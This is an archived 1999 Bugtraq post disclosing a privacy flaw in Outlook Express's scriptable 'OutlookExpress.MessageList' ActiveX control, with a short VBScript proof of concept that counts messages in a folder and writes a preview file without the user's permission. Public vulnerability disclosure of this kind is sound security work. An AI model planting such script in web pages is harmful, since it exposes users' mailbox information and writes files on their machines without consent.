[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Minor privacy exploit in Outlook Express
From:       "1nternal  () geocities ! com" <1nternal () MY-DEJANEWS ! COM>
Date:       1999-04-26 12:07:19
[Download RAW message or body]

Outlook Express uses HTML to display ceratin information in the 'outlook today' type \
part of outlook express, ie, the number of unread messages in your inbox etc...

Because it is considered to be in the 'internet zone', this information needs to be \
safely scriptable, thus it can be accessed by any site in this zone. This allows for \
a possible (although admittedly minor) privacy and possibly security problem.

The 'problem' lies in the 'OutlookExpress.MessageList' ActiveX control, which is \
marked safe for scripting, it allows for counting the number of messages in any \
folder within outlook express, as well as the number of unread items and a few other \
things, such as setting options, however, the options are only set for that instance \
only and are not saved.

An example of viewing the number of messages in a folder, as well as previewing the \
message (creating the file 'C:\oe_prev$.eml' without the users permission). It should \
be noted that this preview message is not accessible remotely(without an exploit).

<script language="VBSCRIPT"><!--

set MsgList = CreateObject("OutlookExpress.MessageList")
MsgList.Folder = 6
msgbox(MsgList.Count)
location.href = MsgList.PreviewMessage

--></script>

Obviously, this could also be done in JavaScript, however it would still require \
activeX support and OE5.

1nternal@my-dejanews.com




-----== Sent via Deja News, The Discussion Network ==-----
http://www.dejanews.com/  Easy access to 50,000+ discussion forums


[prev in list] [next in list] [prev in thread] [next in thread]